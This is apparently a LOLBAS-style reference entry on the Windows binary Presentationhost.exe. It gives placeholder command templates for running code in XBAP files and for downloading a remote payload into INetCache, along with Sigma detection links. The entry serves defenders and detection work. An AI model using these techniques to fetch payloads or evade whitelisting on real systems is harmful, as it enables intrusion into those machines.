Presentationhost.exe

File is used for executing Browser applications

Paths

• C:\Windows\System32\Presentationhost.exe
• C:\Windows\SysWOW64\Presentationhost.exe

Commands

Execute

Executes the target XAML Browser Application (XBAP) file

Use case: Execute code within XBAP files

Privileges: User

Presentationhost.exe {PATH_ABSOLUTE:.xbap}

Download

It will download a remote payload and place it in INetCache.

Use case: Downloads payload from remote server

Privileges: User

Presentationhost.exe {REMOTEURL}

Detection

• Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_presentationhost_download.yml
• Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_presentationhost.yml
• IOC: Execution of .xbap files may not be common on production workstations

Resources

• https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf
• https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/